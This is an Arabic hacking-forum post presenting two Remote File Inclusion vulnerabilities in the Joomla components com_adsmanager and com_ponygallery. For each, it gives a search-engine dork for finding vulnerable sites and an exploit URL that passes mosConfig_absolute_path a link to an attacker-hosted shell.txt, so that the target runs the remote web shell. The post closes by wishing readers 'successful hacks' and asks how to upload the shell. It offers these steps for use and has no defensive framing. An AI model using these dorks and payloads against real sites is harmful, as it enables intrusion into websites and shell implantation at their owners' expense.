السلام عليكم ورحمة الله تعالى و بركاته
ظهرت ثغرتان جديدتان في سكريبت joomla
الثغرة الاولى
Joomla Component com_adsmanager Remote File Include
تاريخ اكتشاف الثغرة 23/12/2010
مكتشف الثغرة : AtT4CKxT3rR0r1ST
تحميل السكربت :
http://downloads.ziddu.com/downloadf...adsmanager.zip
و الآن الشيء المهم
الدورك :
كود PHP:
inurl:"com_adsmanager"
الاستغلال :
كود PHP:
www.site.com/index.php?option=com_adsmanager&mosConfig_absolute_path=[shell.txt?]
حيث site.com هو الموقع
و [?shell.txt] هو رابط الشل بصيغة txt
-----------------------------------
الثغرة الثانية
Joomla Component com_ponygallery Remote File Inclusion Vulnerabilities
تاريخ اكتشاف الثغرة 23/12/2010
مكتشف الثغرة AtT4CKxT3rR0r1ST
الدورك
كود PHP:
inurl:"com_ponygallery"
الاستغلال
كود PHP:
www.site.com/components/com_ponygallery/admin.ponygallery.html.php?mosConfig_absolute_path=[shell.txt?]
او
كود PHP:
www.site.com/components/com_ponygallery/admin.ponygallery.php?mosConfig_absolute_path=[shell.txt?]
حيث site.com هو الموقع
و [?shell.txt] هو رابط الشل بصيغة txt
شباب لي طلب ...ممكن شرح لكيفية رفع الشل من هذه الثغرة
اختراقات موفقة